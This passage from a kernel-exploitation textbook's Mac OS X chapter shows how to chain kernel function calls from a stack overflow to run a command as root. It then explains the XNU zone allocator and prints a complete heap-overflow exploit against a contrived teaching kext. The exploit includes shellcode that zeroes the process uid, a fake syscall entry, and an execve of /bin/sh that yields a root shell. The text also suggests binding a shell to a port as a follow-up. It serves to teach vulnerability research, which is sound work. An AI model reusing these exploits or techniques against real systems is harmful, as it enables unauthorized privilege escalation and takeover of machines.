Since we now have to resolve quite a few symbols, we can simplify things by creating a generic get_symbol() function to retrieve an arbitrary symbol from /mach_kernel. Here is the required function:

u_long get_symbol(char *symbol)

{

#define NMSTRING "nm /mach_kernel | grep "

unsigned int length = strlen(NMSTRING) + strlen(symbol) + 4;

char *buffer = malloc(length);

FILE *fp;

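if(!buffer){

printf("error: allocating symbol string\n");

exit(1);

}

snprintf(buffer,length-1,NMSTRING"%s",symbol);

fp = popen(buffer, "r");

u_long addr = 0;

// bail out if nm could not be run or printed no address

if(!fp || fscanf(fp,"%lx",&addr) != 1){

printf("error: could not resolve %s\n",symbol);

exit(1);

}

pclose(fp);

printf("[+] %s is @ 0x%lx\n",symbol,addr);

free(buffer);

return addr;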

}

Next, we have to work out how our attack string will look to call our functions. In other words, we need to chain together a few function calls.

We need, at minimum, copyin() followed by KUNCExecute() followed by thread_exception_return(). This causes a problem, however. When chaining calls to existing functions from a stack overflow, it is easy to position two return addresses back to back on the stack, followed by the arguments, and both functions will be called. However, once three or more functions are needed, after the epilog of the second function is executed, the stack pointer will be positioned pointing to the first argument to the first function. This means that when the RET instruction is executed it will result in execution being transferred to whatever is stored in the first argument. This is not ideal for our current technique. There are documented methods for calling as many functions as are needed in this manner; however, each brings its own complications and limitations to the table.

Again, we need to put on our thinking hat. In the case of our vulnerability, there is a much easier solution to this problem. We can simply trigger the buffer overflow twice. The first time, we return to copyin(), followed by our exit_kernel function (thread_exception_return()), to write our string into memory. The second time, we return to KUNCExecute(), followed by exit_kernel again. To set up our fake stack frames, we will need to have some way to represent them in our code. To organize this, we can create a fake_frame structure, holding the function we wish to call, followed by the address of exit_kernel, followed by our arguments.

struct fake_frame {

void *function;

void *exit_kernel;

unsigned long arg1;

unsigned long arg2;

unsigned long arg3;

unsigned long arg4;

};

To accommodate our first call to copyin() we can set up our structure as shown in the following code. There are four arguments to copyin(), rather than the three arguments you would expect to see, because GCC performs some very strange optimizations to the copyin() function. Because copyin() is just a wrapper around copyio(), GCC compiles copyin() to receive four arguments, and then moves the second one into ECX and uses JMP to access the copyio() function. Setting this argument to 0 is an acceptable way to make our copyin() call work as expected.

struct fake_frame ff,*ffptr;

ff.function = (void *)get_symbol("copyin");

ff.arg1 = (unsigned long)av[1];

ff.arg2 = 0; // extra argument expected by the compiled copyin(); 0 works

ff.arg3 = get_symbol("iso_font");

ff.arg4 = strlen(av[1]) + 1;

// Add a call to exit_kernel

ff.exit_kernel = (void *)get_symbol("thread_exception_return");

ffptr = (struct fake_frame *)&attackstring[OFFSET];

memcpy(ffptr,&ff,sizeof(ff));

ioctl(fd, DATASTRUCT,&ds);

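As the code shows, we then point the ffptr struct pointer at our attack string, and memcpy() our structure into it. Note that attackstring and ds.size must now cover OFFSET + sizeof(struct fake_frame) bytes, rather than the OFFSET + sizeof(long) used in the proof of concept, so that the whole frame is copied into the kernel. Finally, we call the ioctl() as we did previously to trigger our overflow. We have taken care to write the exploit in such a way that the command to be executed can be passed in on the command line.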

If we pause execution at this stage, we can see that the iso_font[] buffer now contains the string we passed to our exploit:

(gdb) x/s &iso_font

0x4face0 <iso_font>: "MY_COMMAND_HERE"

Now it's time to take care of our second function call. We need to set up our fake_frame struct in almost the same way we set up the previous struct. This time, however, we need to replace our function address with that of KUNCExecute(). By including the UserNotification/KUNCUserNotifications.h header file in our program, we can use the kOpenAppAsRoot and kOpenApplicationPath constants in our exploit directly (the alternative would be to hardcode their values in the code, but this way we are a lot more resistant to potential value changes over time).

#include <UserNotification/KUNCUserNotifications.h>

// Set up our KUNCExecute

ff.function = (void *)get_symbol("KUNCExecute");

ff.arg1 = get_symbol("iso_font");

ff.arg2 = kOpenAppAsRoot;

ff.arg3 = kOpenApplicationPath;

// Add a call to exit_kernel

ff.exit_kernel = (void *)get_symbol("thread_exception_return");

ffptr = (struct fake_frame *)&attackstring[OFFSET];

memcpy(ffptr,&ff,sizeof(ff));

ioctl(fd, DATASTRUCT,&ds);

Now that we have developed exploit code to exploit this vulnerability, we need a way to test it. To facilitate this we must create a binary of some kind that will let us know that we have root privileges. A very simple way to do this is to just execute the touch command to touch a file at a known location. That way, we can check the file permissions and ownership details on the file after exploitation to see what privileges our process ran with. Here is some simple code to do just that:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

int main(int ac, char **av)

{

char *args[] = {"/usr/bin/touch","/tmp/hi",NULL};

char *env[] = {"TERM=xterm",NULL};

execve(*args,args,env);

return 1; // only reached if execve() fails

}

After compiling our test code and moving it to /Users/luser/book/Backdoor, we can run our exploit, passing the path to this binary as the first argument on the command line:

-[luser@macosxbox:~/book]$ ./ret2text /Users/luser/book/Backdoor

[+] copyin is @ 0x19f38e

[+] iso_font is @ 0x4face0

[+] thread_exception_return is @ 0x1a14d0

[+] KUNCExecute is @ 0x1199da

[+] iso_font is @ 0x4face0

[+] thread_exception_return is @ 0x1a14d0

Finally, if we check the ownership and permissions on this file, we can see that it is owned by root:wheel. This means our privilege escalation was successful.

-[luser@macosxbox]$ ls -lsa /tmp/hi

0 -rw-r--r-- 1 root wheel 0 Dec 1 10:30 /tmp/hi

Obviously, to gain a root shell from this point we need to modify our Backdoor.c code to either bind a shell to a port or change the permissions on itself to grant it suid-root privileges. The possibilities here are endless.

Memory Allocator Exploitation

Now that we've covered arbitrary memory games and stack-based exploitation, it is time to move to the kernel heap and focus on exploitation of some of the memory allocators available in XNU.

The first allocator we will target is the zone allocator. A zone allocator is a memory allocator that is specifically designed for fast and efficient allocation of identically sized objects. We will look at this allocator first because it is also the fundamental groundwork for the kalloc() allocator. The source code for this memory allocator is available in the osfmk/kern/zalloc.c file within the XNU source tree. Many of the major structs in the XNU kernel utilize the zone allocator to allocate space. Some examples of these are the task structs, the thread structs, the pipe structs, and even the zone structs used by the zone allocator itself.

The zone allocator exports an API to user space for querying the state of the zones at runtime. The function responsible for this is named host_zone_info(). Mac OS X ships with a utility, /usr/bin/zprint, which you can use to display this information from the command line. It's also an excellent way to see types of objects that are utilizing this allocator by default.

-[luser@macosxbox]$ zprint

                    elem     cur     max     cur     max     cur   alloc   alloc
zone name           size    size    size   #elts   #elts   inuse    size   count
--------------------------------------------------------------------------------
zones                388     51K     52K     136     137     116      8K      21
vm.objects           140    463K    512K    3393    3744    3360      4K      29  C
x86.saved.state      100     23K    252K     244    2580     137     12K     122  C
uthreads             416     63K   1040K     156    2560     137     16K      39  C
alarms                44      0K      4K       0      93       0      4K      93  C
mbuf                 256      0K   1024K       0    4096       0      4K      16  C
socket               408     55K   1024K     140    2570      82      4K      10  C
zombie                72      7K   1024K     113   14563       0      8K     113  C
cred                 136      3K   1024K      30    7710      21      4K      30  C
pgrp                  48      3K   1024K      85   21845      37      4K      85  C
session              312     15K   1024K      52    3360      36      8K      26  C
vnodes               144    490K   1024K    3485    7281    3402     12K      85  C
proc                 596     39K   1024K      68    1759      41     20K      34  C

Before we look at exploiting overflows into this allocator, we need to briefly run through how the allocator works. We will start by walking through the interfaces the zone allocator offers to set up a cache of objects.

First we need to set up a zone with information about the type of object we wish to store in it. We can do this using the zinit() function, the prototype of which looks like this:

zone_t

zinit(

vm_size_t size, /* the size of an element */

vm_size_t max, /* maximum memory to use */

vm_size_t alloc, /* allocation size */

const char *name) /* a name for the zone */

Each argument is pretty self-explanatory: the size provided here will dictate the size of each chunk in the zone; the name passed in as the fourth argument will be visible in the zprint output from user space.

This function essentially begins by checking if this is the first zone on the system. If it is, zones_zone will not have been created yet. If this is the case, zinit() will create a zone to hold its own data. If this is not the case, zalloc() will be used to allocate room for information about this zone from zones_zone. This allocation will provide room to store our zone structure. The format of the zone struct is as follows:

struct zone {

int count; /* Number of elements used now */

vm_offset_t free_elements;

decl_mutex_data(,lock) /* generic lock */

vm_size_t cur_size; /* current memory utilization */

vm_size_t max_size; /* how large can this zone grow */

vm_size_t elem_size; /* size of an element */

vm_size_t alloc_size; /* size used for more memory */

unsigned int

/* boolean_t */ exhaustible:1, /* (F) merely return if empty? */

/* boolean_t */ collectable:1, /* (F) garbage collect empty pages */

/* boolean_t */ expandable:1, /* (T) expand zone (with message)? */

/* boolean_t */ allows_foreign:1, /* (F) allow non-zalloc space */

/* boolean_t */ doing_alloc:1, /* is zone expanding now? */

/* boolean_t */ waiting:1, /* is thread waiting for expansion? */

/* boolean_t */ async_pending:1, /* asynchronous allocation pending? */

/* boolean_t */ doing_gc:1; /* garbage collect in progress? */

struct zone * next_zone; /* Link for all-zones list */

call_entry_data_t call_async_alloc;

/* callout for asynchronous alloc */

const char *zone_name; /* a name for the zone */

#if ZONE_DEBUG

queue_head_t active_zones; /* active elements */

#endif /* ZONE_DEBUG */

};

After allocating room for the zone struct, zinit() will populate it with some basic initialization data:

z->free_elements = 0;

z->cur_size = 0;

z->max_size = max;

z->elem_size = size;

z->alloc_size = alloc;

z->zone_name = name;

z->count = 0;

z->doing_alloc = FALSE;

z->doing_gc = FALSE;

z->exhaustible = FALSE;

z->collectable = TRUE;

z->allows_foreign = FALSE;

z->expandable = TRUE;

z->waiting = FALSE;

z->async_pending = FALSE;

The most important element of this structure for us to keep in mind during exploitation is the free_elements attribute. During the zinit() initialization, this is set to 0. This indicates that there are no chunks on the free list.

Once zinit() is complete, our zone is set up and available for allocations. The zalloc() function is typically used to allocate a chunk of memory from our zone. However, there is also a function called zget() that will acquire memory from the zone without blocking. When zalloc() is called, the first thing it does is check the free_elements attribute of the zone struct to see if there is anything on the free list. If there is, it will use the REMOVE_FROM_ZONE() macro to remove the element from the free list, and return it:

#define REMOVE_FROM_ZONE(zone, ret, type) \
MACRO_BEGIN \
    (ret) = (type) (zone)->free_elements; \
    if ((ret) != (type) 0) { \
        if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0])) { \
            panic("A freed zone element has been modified.\n"); \
        } \
        (zone)->count++; \
        (zone)->free_elements = *((vm_offset_t *)(ret)); \
    } \
MACRO_END


The REMOVE_FROM_ZONE() macro simply returns the free_elements pointer from the zone struct. It then dereferences it and updates the zone struct with the address of the next free chunk. A check is in place to make sure the address points to kernel space: is_kernel_data_addr(). However, this check is fairly useless, as it basically only ends up checking that the address is between 0x1000 and 0xFFFFFFFF. It also checks that the address is word-aligned (!(address & 0x3)). This really provides very few limitations when it comes to exploitation. Before the address is returned to the caller, however, the memory is block-zeroed. This causes some issues for exploitation; we will look at them in more detail later in this section.

If there is no element on the free list, zalloc() will take the next chunk in order from the mapping zinit() created to be divided. When a mapping has been used up entirely and the free list is empty, the allocator uses the kernel_memory_allocate() function to create a new mapping. This is similar to a memory allocator using the brk() or mmap() function from user space.

As we would expect, the opposite of a zalloc() call is to use the zfree() function. This will add an element back to the zone free_elements list. This function uses several sanity checks to make sure the pointer being free()'ed belongs to kernel memory and came from the zone passed to the function. Again, when accessing the free_elements list a macro is used; this time it is ADD_TO_ZONE():

#define ADD_TO_ZONE(zone, element) \
MACRO_BEGIN \
    if (zfree_clear) \
    { unsigned int i; \
      for (i=1; \
           i < zone->elem_size/sizeof(vm_offset_t) - 1; \
           i++) \
        ((vm_offset_t *)(element))[i] = 0xdeadbeef; \
    } \
    ((vm_offset_t *)(element))[0] = (zone)->free_elements; \
    (zone)->free_elements = (vm_offset_t) (element); \
    (zone)->count--; \
MACRO_END

If zfree_clear is set, this macro begins by writing the value 0xdeadbeef in 4-byte intervals through the memory region being free()'ed, skipping the first word, which is reserved for the list pointer. After this, it writes the current value of the free_elements attribute of the zone struct into the start of the newly free()'ed element. Finally, it writes the address of the element being free()'ed back to the zone struct's free_elements attribute, updating the free list head.

To give you a better understanding of the free list, Figure 5.18 shows the relationship. The list is a singly linked list. The zone struct element free_elements contains the list head. Each free element points to the next free element in turn, as you can see in the figure.

Image

Figure 5.18 Singly linked free list

This description should be enough to provide a basic example of an overflow into a zone. Again, since there are no public examples of vulnerabilities like this, we will contrive an example for educational purposes. To do this, we can modify our memcpy()-based example kext from the “Stack-Based Buffer Overflows” section. Rather than allocating the buffer on the stack, we can make a buffer zone and allocate a new buffer in it each time our IOCTL is called.

The first change we need to make is to add a call to zinit() in the start function of our kernel extension. We'll use the following arguments:

#define BUFFSIZE 44

buff_zone = zinit(

BUFFSIZE, /* the size of an element */

(BUFFSIZE * MAXBUFFS) + BUFFSIZE, /* maximum memory to use */

0, /* allocation size */

"BUFFERZONE"); /* a name for the zone */

As you can see, this creates a zone called BUFFERZONE in which to store our data.

We then define two different commands for our IOCTL: ADDBUFFER to perform a new allocation, and FREEBUFFER to zfree() one of our allocated buffers.

#define ADDBUFFER _IOWR('d',0,datastruct)

#define FREEBUFFER _IOWR('d',1,datastruct)

Next, in our IOCTL code, we add a switch statement to determine which command is being used. If ADDBUFFER is passed in, we perform the same flawed check on the length field from the stack example, and then copy data from user space straight into our freshly allocated buffer. We also use an extra element in our datastruct, kern_ptr, as a unique ID for our buffers array. This value is leaked back to user space, and provides some interesting insight into what's going on.

In the FREEBUFFER case, we simply check if the buffer passed in by the user in kern_ptr is one of the buffers allocated by our kext. If it is, it is passed to zfree() to be returned to the zone. Here is the full source listing for our IOCTL:

static int ZoneAllocOverflowIOCTL(dev_t dev, u_long cmd, caddr_t data,int flag, struct proc *p)

{

datastruct *ds = (datastruct *)data;

char *buffer = 0;

switch(cmd) {

case ADDBUFFER:

printf("Adding buffer to array ");

buffer = zalloc(buff_zone);

if(!buffer) {

printf("error: could not allocate buffer ");

return KERN_FAILURE;

}

memset(buffer,'\x00',BUFFSIZE);

if(sizeof(data) > BUFFSIZE){

printf("error: data too big for buffer. ");

return KERN_FAILURE;

}

if(copyin((void *)ds->data, (void *)buffer, ds->size) == -1){

printf("error: copyin failed. ");

return KERN_FAILURE;

}

if(add_buffer(buffer) == KERN_FAILURE){

printf("max number of buffers reached ");

return KERN_FAILURE;

}

ds->kern_ptr = buffer;

return KERN_SUCCESS;

break;

case FREEBUFFER:

printf("Freeing buffer… ");

if(free_buffer(ds->kern_ptr) == KERN_FAILURE){

printf("could not locate buffer to free ");

return KERN_FAILURE;

}

ds->kern_ptr = 0;

break;

default:

printf("error: bad ioctl cmd ");

return KERN_FAILURE;

}

printf("Success! ");

return KERN_SUCCESS;

}

Now that our target is defined it's time to look at how we would exploit this example. In reality, this example is a little too perfect as it allows us to arbitrarily allocate chunks and free them in any order we choose. As we mentioned, it also leaks the address of the chunk back to user space, which is very useful from an exploitation perspective.

Before we trigger the overflow, we can make an application that simply calls ioctl() three times in a row using the ADDBUFFER command, then prints the address of the buffer returned. Here is the resultant output:

alloc1 @ 0x4975dec

alloc2 @ 0x4975dc0

alloc3 @ 0x4975d94

As we can see, each allocation is performed starting from the high end of the mapping and moving toward the low memory addresses. We can also see that each allocation is exactly 44 bytes apart. If we run this program a few times and then execute zprint, we can see our BUFFERZONE statistics in the output:

vstruct.zone 80 0K 784K 0 10035 0 4K 51 C

BUFFERZONE 44 3K 24K 93 558 15 4K 93 C

kernel_stacks 16384 1440K 1440K 90 90 68 16K 1 C

The next step toward exploiting this kernel extension is to observe our zone's behavior when we use the FREEBUFFER command with our IOCTL. If we modify our test program a little to allocate three chunks, retain the address of the first and second chunks, and then free them in turn, we can see that the next allocation performed will always return the last chunk free()'ed by the zone allocator. This opens up all the possibilities we described in Chapter 3 when we talked about general kernel heap allocator techniques. The only difference is that we target a free chunk with our overflow, not an allocated victim. Since chunks are allocated from high addresses toward low addresses, this means we need to free our two allocations in the reverse order to receive the allocation stored in lower memory upon our next allocation. Here is the output from our sample program to verify this:

-[luser@macosxbox]$ ./zonesmash

alloc1 @ 0x48cadec

alloc2 @ 0x48cadc0

alloc3 @ 0x48cad94

[+] Freeing alloc1

[+] Freeing alloc2

new alloc @ 0x48cadc0

The first step in almost any heap overflow exploit is to try to get the heap to a known reliable state. Since the heap is used dynamically with buffers allocated and freed according to program logic, the heap can be in a different state every time exploitation is attempted. Thankfully, with a zone allocator this is a relatively easy problem to solve. To get the heap to a reliable state we can query the capacity of the target zone using zprint. Then we can perform as many allocations as necessary, without reaching the maximum number of entries reported by zprint, to remove all entries from the free list. When the free list is empty, we can allocate our chunks with the knowledge that they will be contiguous in memory. Also, unlike other forms of memory allocators, we are at no risk of our chunks being coalesced because all chunks in a zone are of the same size.

Since our example is relatively controlled, our sample exploit simply performs a fixed number of allocations (11, since the loop counts from 0 through 10) to make sure the free list is clean:

// fill gaps

int i;

for(i = 0; i <= 10; i++)

ioctl(fd, ADDBUFFER,&ds);

Now that the zone is in a clean state, we can perform the same allocations our investigatory code performed earlier. We allocate three buffers and free the first two allocations. Then we perform another allocation, this time overflowing outside the 44-byte boundary of our newly returned chunk. This will allow us to overwrite the next_chunk pointer in the free chunk directly below our current chunk in memory. When we perform an additional allocation, this adjacent chunk is removed from free_list. As we discussed earlier in this section, the REMOVE_FROM_ZONE macro will write the overflowed next_chunk pointer to the head of free_list in the zone struct. This means the next allocation from our zone will result in the user-controlled pointer being returned as the allocation itself. To test this theory, we write 44 bytes into our chunk, followed by the 4-byte value 0xcafebabe. After our allocations are performed, we print the zone struct using the print command in GDB, and we can see that the free_elements attribute indeed contains 0xcafebabe.

(gdb) print *(struct zone *)0x16c8fd4

$1 = {

count = 15,

free_elements = 3405691582, (0xcafebabe)

This means the next time we perform an ADDBUFFER command with this IOCTL, we will be able to write user-controlled data to any location of our choice within the kernel. At this stage, we have a situation almost identical to our arbitrary memory overwrite example earlier in this section. Just like in that example, we are able to locate the address of the sysent table and overwrite an unused sysent struct. However, since zalloc() actually forcefully writes \x00 bytes over the newly returned buffer, we cannot limit our overwrite to only the size of the sysent struct, as the full 44 bytes will be filled with NULL bytes. However, since the structure of the sysent table is actually quite predictable and static, we could simply fill our buffer with values retrieved from the mach_kernel binary so that the rest of the system remains unchanged by the overwrite.

The implementation of this approach is left as an exercise. In this case, however, the size of the overwrite (44 bytes) is small enough that it touches only two sysent entries. The entry we used in the earlier example (syscall 21) is actually followed by another empty sysent entry. Therefore, clobbering that unused entry with zeros has very few negative consequences for us.

If we modify our code from the beginning of the section “Exploitation Notes,” to move the address of the sysent struct we wish to modify, to free_list, and then write our fake sysent struct into the next allocation and call our system call with syscall(21,0,0,0), we are greeted with the familiar message signifying that we have gained control of EIP:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

At first glance, you may be concerned that when removing the pointer to the sysent array from free_list the pointer would have been dereferenced and the result used to update the head of free_list. However, we can rely on the fact that the empty sysent entry we are overwriting has the initial state of being filled with NULL bytes. This means the free list head will be updated with a 0x0. This will re-create our empty free_list and result in a reliable exploit.

Now that we have reliable control of execution, we need to determine where to put our shellcode. In this crafted scenario, this is an easy problem to solve, because our sample kernel extension leaks heap addresses back to user space. By storing the shellcode in our third allocation and then using its address as the return address, we can reliably return to our shellcode.

Note

Had this information leak not existed, however, we could have simply utilized the p_comm technique we discussed in the section “Exploitation Notes.”

Putting this all together, and compiling and executing our exploit, gives us a root shell:

-[luser@macosxbox]$ ./zonesmash

[+] Retrieving address of syscall table…

[+] nsysent is @ 0x50f9e0

[+] Syscall 21 is @ 0x50fbf8

alloc1 @ 0x3b02dec

alloc2 @ 0x3b02dc0

shellcode @ 0x3b02d94

[+] Freeing alloc1

[+] Freeing alloc2

[+] Performing overwrite

new alloc @ 0x3b02dc0

[+] Moving sysent address to free_list

[+] Setting up fake syscall entry.

uid: 0 euid: 501

sh-3.2# id

Again, as usual, the full source code for this exploit is available online at www.attackingthecore.com.

For the sake of completeness we have also included it here:

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <sys/types.h>

#include <sys/sysctl.h>

#include <sys/param.h>

#include <unistd.h>

#include <string.h>

#define BUFFSIZE (44+4)

#define ADDBUFFER _IOWR('d',0,datastruct)

#define FREEBUFFER _IOWR('d',1,datastruct)

#define SYSCALL_NUM 21

#define LEOPARD_HIT_ADDY(a) ((a)+(sizeof(struct sysent)*SYSCALL_NUM))

struct sysent {

short sy_narg;

char sy_resv;

char sy_flags;

void *sy_call;

void *sy_arg_munge32;

void *sy_arg_munge64;

int sy_return_type;

short sy_arg_bytes;

};

typedef struct datastruct {

void *data;

unsigned long size;

void *kern_ptr;

} datastruct;

unsigned char shellcode[] =

"\x55" // push ebp

"\x89\xE5" // mov ebp,esp

"\x8B\x4D\x08" // mov ecx,[ebp+0x8]

"\x8B\x49\x64" // mov ecx,[ecx+0x64]

"\x31\xC0" // xor eax,eax

"\x89\x41\x10" // mov [ecx+0x10],eax

"\xC9" // leave

"\xC3"; // ret

u_long get_symbol(char *symbol)

{

#define NMSTRING "nm /mach_kernel | grep "

unsigned int length = strlen(NMSTRING) + strlen(symbol) + 4;

char *buffer = malloc(length);

FILE *fp;

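if(!buffer){

printf("error: allocating symbol string\n");

exit(1);

}

snprintf(buffer,length-1,NMSTRING"%s",symbol);

fp = popen(buffer, "r");

u_long addr = 0;

// bail out if nm could not be run or printed no address

if(!fp || fscanf(fp,"%lx",&addr) != 1){

printf("error: could not resolve %s\n",symbol);

exit(1);

}

pclose(fp);

printf("[+] %s is @ 0x%lx\n",symbol,addr);

free(buffer);

return addr;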

}

int main(int ac, char **av)

{

struct sysent fsysent;

datastruct ds;

int fd;

unsigned char attackstring[BUFFSIZE];

unsigned long *ptr,sc_addr;

char *env[] = {"TERM=xterm",NULL};

void *ret;

char *shell[] = {"/bin/sh",NULL};

//size_t done = 0;

if((fd = open ("/dev/heapoverflow", O_RDONLY)) == -1 ){

printf("error: couldn't open /dev/heapoverflow ");

exit(1);

}

memset(attackstring,'\x90',BUFFSIZE);

memcpy(attackstring,shellcode,sizeof(shellcode));

ds.data = attackstring;

ds.size = sizeof(shellcode);

ds.kern_ptr = 0;

printf("[+] Retrieving address of syscall table… ");

sc_addr = get_symbol("nsysent");

sc_addr += 32;

sc_addr = LEOPARD_HIT_ADDY(sc_addr);

//sc_addr -= 10;

printf("[+] Syscall 21 is @ 0x%x ", sc_addr);

//exit(0);

// fill gaps

int i;

for(i = 0; i <= 10; i++)

ioctl(fd, ADDBUFFER,&ds);

void *alloc1 = 0;

void *alloc2 = 0;

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

alloc1 = ds.kern_ptr;

printf("alloc1 @ 0x%x ", ds.kern_ptr);

}

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

alloc2 = ds.kern_ptr;

printf("alloc2 @ 0x%x\n", ds.kern_ptr);

}

ioctl(fd, ADDBUFFER,&ds);

if(!ds.kern_ptr) {

printf("[+] Shellcode failed to be allocated\n");

exit(1);

}

ret = ds.kern_ptr;

printf("shellcode @ 0x%x\n", ds.kern_ptr);

printf("[+] Freeing alloc1\n");

ds.kern_ptr = alloc1;

ioctl(fd, FREEBUFFER,&ds);

if(ds.kern_ptr != 0) {

printf("free failed.\n");

}

printf("[+] Freeing alloc2\n");

ds.kern_ptr = alloc2;

ioctl(fd, FREEBUFFER,&ds);

if(ds.kern_ptr != 0) {

printf("free failed.\n");

exit(1);

}

// place the target address in the last pointer-sized slot of the buffer

ptr = (unsigned long *)&attackstring[BUFFSIZE-sizeof(void *)];

*ptr = sc_addr;

printf("[+] Performing overwrite\n");

ds.size = BUFFSIZE;

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

printf("new alloc @ 0x%x\n", ds.kern_ptr);

}

printf("[+] Moving sysent address to free_list\n");

ds.size = 10;

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

alloc1 = ds.kern_ptr;

}

ds.size = 10;

printf("[+] Setting up fake syscall entry.\n");

fsysent.sy_narg = 1;

fsysent.sy_resv = 0;

fsysent.sy_flags = 0;

fsysent.sy_call = (void *)ret;

fsysent.sy_arg_munge32 = NULL;

fsysent.sy_arg_munge64 = NULL;

fsysent.sy_return_type = 0;

fsysent.sy_arg_bytes = 4;

ds.data = &fsysent;

ds.size = sizeof(fsysent);

ds.kern_ptr = 0;

ioctl(fd, ADDBUFFER,&ds);

syscall(21,0,0,0);

printf("uid: %i euid: %i\n",getuid(),geteuid());

execve(*shell,shell,env);

}

We mentioned at the start of this section that the zone allocator is the basic building block for kalloc (the kernel allocator). In fact, the kernel allocator, the most widely used general-purpose allocator in XNU, is simply a wrapper around zalloc functionality. During kalloc initialization, several zones are created with the zone allocator, each housing allocations of a different size. Allocations larger than the largest zone are performed using kmem_alloc(), which just creates new page mappings. The k_zone_name array shown in the following code contains the name of each zone:

static const char *k_zone_name[16] = {

"kalloc.1", "kalloc.2",

"kalloc.4", "kalloc.8",

"kalloc.16", "kalloc.32",

"kalloc.64", "kalloc.128",

"kalloc.256", "kalloc.512",

"kalloc.1024", "kalloc.2048",

"kalloc.4096", "kalloc.8192",

"kalloc.16384", "kalloc.32768"

};

When a kalloc allocation takes place, the requested size is compared against the size of each zone in turn until one large enough is found; then zalloc_canblock() is called directly on that zone to allocate a new chunk. Because of this behavior, the technique shown in the preceding code for zalloc will work identically on a kalloc-allocated buffer.

Race Conditions

The XNU kernel is preemptive; therefore, race conditions are abundant. The authors are aware of several undisclosed vulnerabilities in XNU due to this fact. However, exploiting these vulnerabilities is no different from exploiting them on any other UNIX-derived operating system, so the techniques we described in Chapter 4 remain valid on Mac OS X.

Snow Leopard Exploitation

As we discussed in the chapter introduction, the latest release of Mac OS X, named Snow Leopard, is a 64-bit operating system. Nevertheless, the kernel has changed less than you'd expect. By default, Snow Leopard boots a 32-bit kernel alongside a 64-bit user space. This means many of the techniques we've looked at in this chapter are still completely valid on Snow Leopard. Snow Leopard can also be booted with a 64-bit kernel, but from what we can tell so far, nothing has been changed that will limit the techniques we described.

Summary

In this chapter, we highlighted some of the similarities and differences between Mac OS X and other UNIX derivatives. Mac OS X can be an interesting platform on which to perform vulnerability research, as there is very little documented work on the subject. Its user base has also been growing significantly in recent years.

The design of Mac OS X is different from the majority of the x86/x86-64 implementations of the other operating systems we discuss in this book, and as we detailed, this poses a few interesting challenges. The most interesting challenge is its separated user and kernel address space. It's no surprise that the technique we used, placing the shellcode inside the command line, was first applied against Solaris/UltraSPARC environments and presented in the PHRACK 64 article “Kernel Exploitation Notes.” This “borrowing” or “reusing” of techniques should be expected. At its heart, Mac OS X is a BSD derivative, and thus is still a child of the UNIX family.

Since Mac OS X is not entirely open source, we focused a little more on some common debugging and reverse-engineering approaches, using IDA Pro to show how closed source extensions may present interesting (and vulnerable) paths. In Chapter 6 we will continue our discussion of closed source operating systems when we take a look at vulnerability exploitation in the Windows operating system.

A It is possible to use DDB instead of GDB; however, to do this a custom kernel is needed, and a serial connection must be used.

B www.hexrays.com

C www.digit-labs.org/files/exploits/vmware-fission.c
